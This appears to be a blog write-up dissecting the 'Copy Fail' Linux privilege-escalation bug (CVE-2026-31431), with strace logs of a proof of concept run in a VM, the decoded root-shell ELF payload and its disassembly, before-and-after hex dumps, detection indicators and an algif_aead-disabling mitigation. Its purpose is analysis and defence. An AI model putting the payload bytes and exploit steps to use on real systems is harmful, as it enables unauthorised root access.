Side Quest: “Copy Fail”

Join me as I try my hand at dissecting the recent "Copy Fail" (CVE-2026–31431) vulnerability: first how it works, and then what it looks like while running in real time.

Vulnerabilities, aside from the obvious catastrophic consequences, are always fascinating to me. You give an input to an incredibly complex machine, and for some reason the output is something the machine was never supposed to do. It is a puzzle that requires tracing through the machine to understand what happened.

So, I decided to see if I could trace this one myself.

There are already several excellent write-ups on the detections, patching, and broader implications of this attack. My goal here is narrower: to walk through the mechanics slowly enough so that I (and hopefully you) can understand what is occurring in the background.

Background

"Copy Fail" is a Linux local privilege escalation vulnerability. In practical terms, it allows a normal local user to escalate to root under the right kernel conditions. The issue is tracked as CVE-2026–31431 and has been described as a flaw in the Linux kernel's algif_aead users pace crypto interface, reachable through AF_ALG sockets.

In the classical operating-system model, there is userland and there is kernel space. Userland is where ordinary programs run. Kernel space is where the operating system manages memory, files, devices, processes, permissions, and the general machinery of civilization.

That boundary matters because the kernel has authority that normal processes do not. A normal user process cannot simply rewrite /usr/bin/su, change file permissions, or declare itself root. The kernel is supposed to enforce those rules.

But kernels also expose functionality to userland. They have to. Otherwise every program would be trapped in its own padded room, unable to do anything useful. One of those exposed interfaces is AF_ALG, a Linux socket interface that lets userland ask the kernel to perform cryptographic operations.

That is where this vulnerability lives.

Copy Fail involves a specific AEAD crypto path: authencesn(hmac(sha256),cbc(aes)). In normal human terms, this is a kernel crypto operation involving authentication and encryption. The attacker does not particularly care about cryptography here. They care that this specific path has a broken memory-handling behavior.

The bug gives the attacker a controlled 4-byte write into the Linux page cache. Public analyses describe the issue as a chain involving AF_ALG, splice(), and authencesn, where a 4-byte sequence-number-related scratch write lands inside the cached memory backing a readable file.

In Linux everything is essentially a file (technically a "file descriptor" in case the Linux people come for me). Files are files, sockets are files, terminals are files. The splice() command allows the moving of data from one location to a socket file (or file descriptor) without actually making a copy of the data.

This concept was very difficult for me but think of it like you would a webserver. You have a TCP socket used by an HTTP webserver and you have data that needs to be transported over the TCP socket. Splice() allows you to move that file backed data efficiently to the socket without copying over the requested page to user space.

The difference is that splice() allows page-cache-backed data from /usr/bin/su to flow into the AF_ALG crypto operation without first becoming an ordinary user space copy. The crypto path should treat that data as input only. The vulnerability is that, under this specific AEAD path, a 4-byte write lands back in the cached file page..

That last part is the important part: the page cache.

Linux caches file contents in memory. If a file is read or executed, the kernel may keep its contents in RAM so it does not have to go back to disk every time. This is normally boring and good. Performance improves. Everyone goes home happy.

But in this case, the exploit targets the cached contents of a file rather than the file on disk.

The popular target is /usr/bin/su.

Why su? Because it is commonly a setuid-root binary:

-rwsr-xr-x root root /usr/bin/su

-rwsr-xr-x root root /usr/bin/su

Notice the s in the owner execute position. That means setuid. When /usr/bin/su is executed, the kernel starts it with root privileges because the file is owned by root and has the setuid bit set.

Normally, that is safe because the real su program then performs authentication. It asks for a password, checks PAM policy, and only gives you a shell if you are allowed to have one.

Copy Fail breaks the arrangement by attacking the cached executable content.

The Exploit

First, the vulnerable crypto path can be turned into a controlled 4-byte page-cache write. This does not mean the attacker opens /usr/bin/su for writing. They do not need write permission. Instead, they use splice() to move page-cache-backed data from /usr/bin/su through a pipe and into an AF_ALG crypto operation. Due to the kernel bug, a 4-byte write that should have stayed inside the crypto operation lands in the cached file page instead.

Second, /usr/bin/su is useful because it already carries the setuid-root privilege metadata. The attacker does not need to create a new privileged file. They temporarily corrupt the in-memory cached contents of a privileged file that already exists.

The exploit carries a tiny Linux executable payload. It is not a full replacement for su. It does not implement password checking or PAM or anything noble like that. It is a very small ELF whose job is essentially:

setuid(0);
execve("/bin/sh", ...);

setuid(0);
execve("/bin/sh", ...);

The exploit writes that tiny ELF into the cached beginning of /usr/bin/su, four bytes at a time.

The process looks roughly like this:

1. Open /usr/bin/su read-only.

2. Decompress the tiny ELF payload embedded in the script.

3. For each 4-byte chunk of that payload:
   - configure the vulnerable AF_ALG crypto operation
   - splice page-cache-backed bytes from /usr/bin/su into the crypto path
   - trigger crypto finalization
   - cause the vulnerable 4-byte write to land at the desired cached file offset

4. Repeat until the front of the cached /usr/bin/su image has been replaced with the tiny ELF.

5. Execute /usr/bin/su.

6. The kernel applies /usr/bin/su’s setuid-root metadata, but loads the poisoned cached executable bytes.

7. The tiny ELF runs as root and launches /bin/sh.

1. Open /usr/bin/su read-only.

2. Decompress the tiny ELF payload embedded in the script.

3. For each 4-byte chunk of that payload:
   - configure the vulnerable AF_ALG crypto operation
   - splice page-cache-backed bytes from /usr/bin/su into the crypto path
   - trigger crypto finalization
   - cause the vulnerable 4-byte write to land at the desired cached file offset

4. Repeat until the front of the cached /usr/bin/su image has been replaced with the tiny ELF.

5. Execute /usr/bin/su.

6. The kernel applies /usr/bin/su’s setuid-root metadata, but loads the poisoned cached executable bytes.

7. The tiny ELF runs as root and launches /bin/sh.

The file on disk does not need to change. The kernel's cached view of the file changes. Thus when the system believes that it is executing /usr/bin/su, and from a metadata perspective it is, the bytes being loaded from the page cache are no longer the real su program.

Exploit in Action:

Unlike some PoC's this one is very easy to find. The Github for it is located here. While it is heavily obfuscated, it is simple to execute. Moreover it does not require any special Python libraries OS, zlib, and socket. All which are part of the standard library installed with Python. My first attempt at executing the script (in a secure VM of course), however, ended in failure. Despite not updating the Linux Kernel it appeared the vulnerable socket had already been disabled. Not something particular hard to reverse, but still an interesting way of blocking the exploit (more on that later).

echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif-aead.conf
rmmod algif_aead 2>/dev/null

echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif-aead.conf
rmmod algif_aead 2>/dev/null

Once this pesky safety measure was removed, the Python script executed and I was gifted with a root shell. Now of course I have already outlined the theory of the vulnerability, but I wanted to see it actually occur. For this I used the traditional strace method. This would allow me to track system calls.

Baselines

The hash value at the beginning of this exercise for /usr/bin/su was fa8542e6a4e74c07e3203687cb1fe1cf42bbf2d173b6b157eccb806b5d2e85.
The stat value was:

  File: /usr/bin/su
  Size: 55680      Blocks: 112        IO Block: 4096   regular file
Device: 803h/2051d Inode: 274965      Links: 1
Access: (4755/-rwsr-xr-x)  Uid: (    0/    root)   Gid: (    0/    root)
Access: 2026-04-17 06:21:05.000000000 -0500
Modify: 2026-03-06 10:10:04.000000000 -0600
Change: 2026-04-17 06:21:05.932706798 -0500
 Birth: 2026-04-17 06:21:05.882706674 -0500

  File: /usr/bin/su
  Size: 55680      Blocks: 112        IO Block: 4096   regular file
Device: 803h/2051d Inode: 274965      Links: 1
Access: (4755/-rwsr-xr-x)  Uid: (    0/    root)   Gid: (    0/    root)
Access: 2026-04-17 06:21:05.000000000 -0500
Modify: 2026-03-06 10:10:04.000000000 -0600
Change: 2026-04-17 06:21:05.932706798 -0500
 Birth: 2026-04-17 06:21:05.882706674 -0500

The first 256 bytes of the hex of the binary was

00000000: 7f45 4c46 0201 0100 0000 0000 0000 0000  .ELF............
00000010: 0300 3e00 0100 0000 203f 0000 0000 0000  ..>..... ?......
00000020: 4000 0000 0000 0000 c0d1 0000 0000 0000  @...............
00000030: 0000 0000 4000 3800 0d00 4000 1f00 1e00  ....@.8...@.....
00000040: 0600 0000 0400 0000 4000 0000 0000 0000  ........@.......
00000050: 4000 0000 0000 0000 4000 0000 0000 0000  @.......@.......
00000060: d802 0000 0000 0000 d802 0000 0000 0000  ................
00000070: 0800 0000 0000 0000 0300 0000 0400 0000  ................
00000080: 1803 0000 0000 0000 1803 0000 0000 0000  ................
00000090: 1803 0000 0000 0000 1c00 0000 0000 0000  ................
000000a0: 1c00 0000 0000 0000 0100 0000 0000 0000  ................
000000b0: 0100 0000 0400 0000 0000 0000 0000 0000  ................
000000c0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
000000d0: b024 0000 0000 0000 b024 0000 0000 0000  .$.......$......
000000e0: 0010 0000 0000 0000 0100 0000 0500 0000  ................
000000f0: 0030 0000 0000 0000 0030 0000 0000 0000  .0.......0......

00000000: 7f45 4c46 0201 0100 0000 0000 0000 0000  .ELF............
00000010: 0300 3e00 0100 0000 203f 0000 0000 0000  ..>..... ?......
00000020: 4000 0000 0000 0000 c0d1 0000 0000 0000  @...............
00000030: 0000 0000 4000 3800 0d00 4000 1f00 1e00  ....@.8...@.....
00000040: 0600 0000 0400 0000 4000 0000 0000 0000  ........@.......
00000050: 4000 0000 0000 0000 4000 0000 0000 0000  @.......@.......
00000060: d802 0000 0000 0000 d802 0000 0000 0000  ................
00000070: 0800 0000 0000 0000 0300 0000 0400 0000  ................
00000080: 1803 0000 0000 0000 1803 0000 0000 0000  ................
00000090: 1803 0000 0000 0000 1c00 0000 0000 0000  ................
000000a0: 1c00 0000 0000 0000 0100 0000 0000 0000  ................
000000b0: 0100 0000 0400 0000 0000 0000 0000 0000  ................
000000c0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
000000d0: b024 0000 0000 0000 b024 0000 0000 0000  .$.......$......
000000e0: 0010 0000 0000 0000 0100 0000 0500 0000  ................
000000f0: 0030 0000 0000 0000 0030 0000 0000 0000  .0.......0......

Running the Vulnerability

With strace at the ready it became immediately obvious that the vulnerability was proceeding as expected. Upon executing the Python script, the setup of the vulnerability was visible.

# This is the sample loop from the strace logs.

12:18:51.589360 openat(AT_FDCWD, "/usr/bin/su", O_RDONLY|O_CLOEXEC) = 3 <0.000059>
12:18:51.590199 sendmsg(5, {msg_name=NULL, msg_namelen=0, msg_iov=[{iov_base="AAAA\177ELF", iov_len=8}], msg_iovlen=1, msg_control=[{cmsg_len=20, cmsg_level=SOL_ALG, cmsg_type=0x3}, {cmsg_len=36, cmsg_level=SOL_ALG, cmsg_type=0x2}, {cmsg_len=20, cmsg_level=SOL_ALG, cmsg_type=0x4}], msg_controllen=88, msg_flags=0}, MSG_MORE) = 8 <0.000189>
12:18:51.590563 pipe2([6, 7], O_CLOEXEC) = 0 <0.000038>
12:18:51.590667 splice(3, [0], 7, NULL, 4, 0) = 4 <0.000052>
12:18:51.590761 splice(6, NULL, 5, NULL, 4, 0) = 4 <0.000041>

# These are the fd values during the trace.
fd 3 = /usr/bin/su
fd 5 = AF_ALG crypto operation socket
fd 6 = pipe read end
fd 7 = pipe write end

# This is the sample loop from the strace logs.

12:18:51.589360 openat(AT_FDCWD, "/usr/bin/su", O_RDONLY|O_CLOEXEC) = 3 <0.000059>
12:18:51.590199 sendmsg(5, {msg_name=NULL, msg_namelen=0, msg_iov=[{iov_base="AAAA\177ELF", iov_len=8}], msg_iovlen=1, msg_control=[{cmsg_len=20, cmsg_level=SOL_ALG, cmsg_type=0x3}, {cmsg_len=36, cmsg_level=SOL_ALG, cmsg_type=0x2}, {cmsg_len=20, cmsg_level=SOL_ALG, cmsg_type=0x4}], msg_controllen=88, msg_flags=0}, MSG_MORE) = 8 <0.000189>
12:18:51.590563 pipe2([6, 7], O_CLOEXEC) = 0 <0.000038>
12:18:51.590667 splice(3, [0], 7, NULL, 4, 0) = 4 <0.000052>
12:18:51.590761 splice(6, NULL, 5, NULL, 4, 0) = 4 <0.000041>

# These are the fd values during the trace.
fd 3 = /usr/bin/su
fd 5 = AF_ALG crypto operation socket
fd 6 = pipe read end
fd 7 = pipe write end

The pattern above loops through 4 bytes at a time. The /usr/bin/su is opened as fd 3 (which is the /usr/bin/su. The first splice() moves 4 bytes from fd 3, starting at file offset 0, into the pipe's write end, fd 7. The second splice() moves those bytes from the pipe's read end, fd 6, into the AF_ALG operation socket, fd 5. The sendmsg is the transmission of the beginning of the payload iov_base="AAAA\177ELF" (the AAAA is padding and not relevant per se). This is then is followed by the necessary splice activity. Of most importance for us is the sendmsg followed by the splice which references fd 3 (/usr/bin/su).

This loop continues with the sendmsg iov_base field iterating through the vulnerability as it uses the pipe to splice the full malicious payload.

You can go deeper into kernel calls of course. This article has been a fascinating crash course for myself in Linux system operations and I had to stop somewhere to get this article out. (Maybe after a week of studying this my brain was a little fried :).

The payload decoded takes the form:

  7f454c46 02010100 00000000 00000000
  02003e00 01000000 78004000 00000000
  40000000 00000000 00000000 00000000
  00000000 40003800 01000000 00000000
  01000000 05000000 00000000 00000000
  00004000 00000000 00004000 00000000
  9e000000 00000000 9e000000 00000000
  00100000 00000000 31c031ff b0690f05
  488d3d0f 00000031 f66a3b58 990f0531
  ff6a3c58 0f052f62 696e2f73 68000000

  7f454c46 02010100 00000000 00000000
  02003e00 01000000 78004000 00000000
  40000000 00000000 00000000 00000000
  00000000 40003800 01000000 00000000
  01000000 05000000 00000000 00000000
  00004000 00000000 00004000 00000000
  9e000000 00000000 9e000000 00000000
  00100000 00000000 31c031ff b0690f05
  488d3d0f 00000031 f66a3b58 990f0531
  ff6a3c58 0f052f62 696e2f73 68000000

Basically, the ELF magic number is set by this: 7f454c46 . The actual code begins with 31c031ff which in assembly it takes the form

  xor eax, eax
  xor edi, edi
  mov al, 0x69        ; setuid(0)
  syscall

  lea rdi, [rip+0xf]  ; "/bin/sh"
  xor esi, esi
  push 0x3b
  pop rax             ; execve
  cdq
  syscall

  xor edi, edi
  push 0x3c
  pop rax             ; exit
  syscall

  "/bin/sh\0"

  xor eax, eax
  xor edi, edi
  mov al, 0x69        ; setuid(0)
  syscall

  lea rdi, [rip+0xf]  ; "/bin/sh"
  xor esi, esi
  push 0x3b
  pop rax             ; execve
  cdq
  syscall

  xor edi, edi
  push 0x3c
  pop rax             ; exit
  syscall

  "/bin/sh\0"

This is a fairly simple binary which calls /bin/sh.

The assembly code itself is derived from the analysis of the strace logs shown above when running the Python exploit. Taking a hex dump of the /usr/bin/su shows that it has been altered with the exploit:

00000000: 7f45 4c46 0201 0100 0000 0000 0000 0000  .ELF............
00000010: 0200 3e00 0100 0000 7800 4000 0000 0000  ..>.....x.@.....
00000020: 4000 0000 0000 0000 0000 0000 0000 0000  @...............
00000030: 0000 0000 4000 3800 0100 0000 0000 0000  ....@.8.........
00000040: 0100 0000 0500 0000 0000 0000 0000 0000  ................
00000050: 0000 4000 0000 0000 0000 4000 0000 0000  ..@.......@.....
00000060: 9e00 0000 0000 0000 9e00 0000 0000 0000  ................
00000070: 0010 0000 0000 0000 31c0 31ff b069 0f05  ........1.1..i..
00000080: 488d 3d0f 0000 0031 f66a 3b58 990f 0531  H.=....1.j;X...1
00000090: ff6a 3c58 0f05 2f62 696e 2f73 6800 0000  .j<X../bin/sh...
000000a0: 1c00 0000 0000 0000 0100 0000 0000 0000  ................
000000b0: 0100 0000 0400 0000 0000 0000 0000 0000  ................
000000c0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
000000d0: b024 0000 0000 0000 b024 0000 0000 0000  .$.......$......
000000e0: 0010 0000 0000 0000 0100 0000 0500 0000  ................
000000f0: 0030 0000 0000 0000 0030 0000 0000 0000  .0.......0......

00000000: 7f45 4c46 0201 0100 0000 0000 0000 0000  .ELF............
00000010: 0200 3e00 0100 0000 7800 4000 0000 0000  ..>.....x.@.....
00000020: 4000 0000 0000 0000 0000 0000 0000 0000  @...............
00000030: 0000 0000 4000 3800 0100 0000 0000 0000  ....@.8.........
00000040: 0100 0000 0500 0000 0000 0000 0000 0000  ................
00000050: 0000 4000 0000 0000 0000 4000 0000 0000  ..@.......@.....
00000060: 9e00 0000 0000 0000 9e00 0000 0000 0000  ................
00000070: 0010 0000 0000 0000 31c0 31ff b069 0f05  ........1.1..i..
00000080: 488d 3d0f 0000 0031 f66a 3b58 990f 0531  H.=....1.j;X...1
00000090: ff6a 3c58 0f05 2f62 696e 2f73 6800 0000  .j<X../bin/sh...
000000a0: 1c00 0000 0000 0000 0100 0000 0000 0000  ................
000000b0: 0100 0000 0400 0000 0000 0000 0000 0000  ................
000000c0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
000000d0: b024 0000 0000 0000 b024 0000 0000 0000  .$.......$......
000000e0: 0010 0000 0000 0000 0100 0000 0500 0000  ................
000000f0: 0030 0000 0000 0000 0030 0000 0000 0000  .0.......0......

Since this is an effect on the page cache and not the actual /usr/bin/su, it will revert back to the original upon restart since the file itself was not changed.

Detection?

From the blue team perspective though, how are these kinds of attacks detected? Obviously strace is not a viable option to run against every executable.

In my day job Linux security is a very often the red headed step child of forensics. Linux forensics is not necessarily harder than Windows forensics, but it is different. Whereas Windows forensics is a warren of unpublished artifacts that analysts have pieced together by researchers to determine an incident, much of the story of a Linux incident may live in service logs, shell history, auth logs, audit logs, container runtime logs, or whatever telemetry the system happened to be configured to keep. The key with Linux forensics is very often "if you are lucky."

Software detection on Linux is severely lacking because most of the time security software is not placed on systems and log forwarding is not common. This is compounded by the fact that Linux is used across a wide range of environments that simply are not designed for any kind of non-standard installation. Even your thermostat may listen on port 22, and it will likely not allow for even the most lightweight EDR or shipping syscall logs to a SIEM. This is to say nothing of containerization technology whose ephemeral nature make forensics difficult. To paraphrase one researcher: "this attack will be in red team tool chests for a long time".

Perhaps this is pessimistic, but enough time in cybersecurity gives one the sense that this will be a problem for many years to come. Yet not to leave with too much negativity, there are a few things I will be looking for when triaging these systems

This relies heavily on AF_ALG. Most cryptographic operations occur in user space not in the kernel functionality. Even the use of this socket should be enough of an indicator to raise eyebrows.
The use of splice and authencesn will be another strong indicator.
Finally, the use of execve("/usr/bin/su") will likely be a good indicator.

All of these are can be found in auditd and can even be forwarded to a SIEM and later monitoring.

Finally, as noted above, disabling the AF_ALG socket can provide at least a short term solution to the issue.

echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif-aead.conf
rmmod algif_aead 2>/dev/null

echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif-aead.conf
rmmod algif_aead 2>/dev/null

Final Thoughts

This has been an interesting side quest and truly has helped me learn a lot about the way the Linux kernel works (more than I would expect from a small Python script) . Without a doubt this will likely continue to be a problem. At the very least I hope you reader found it interesting.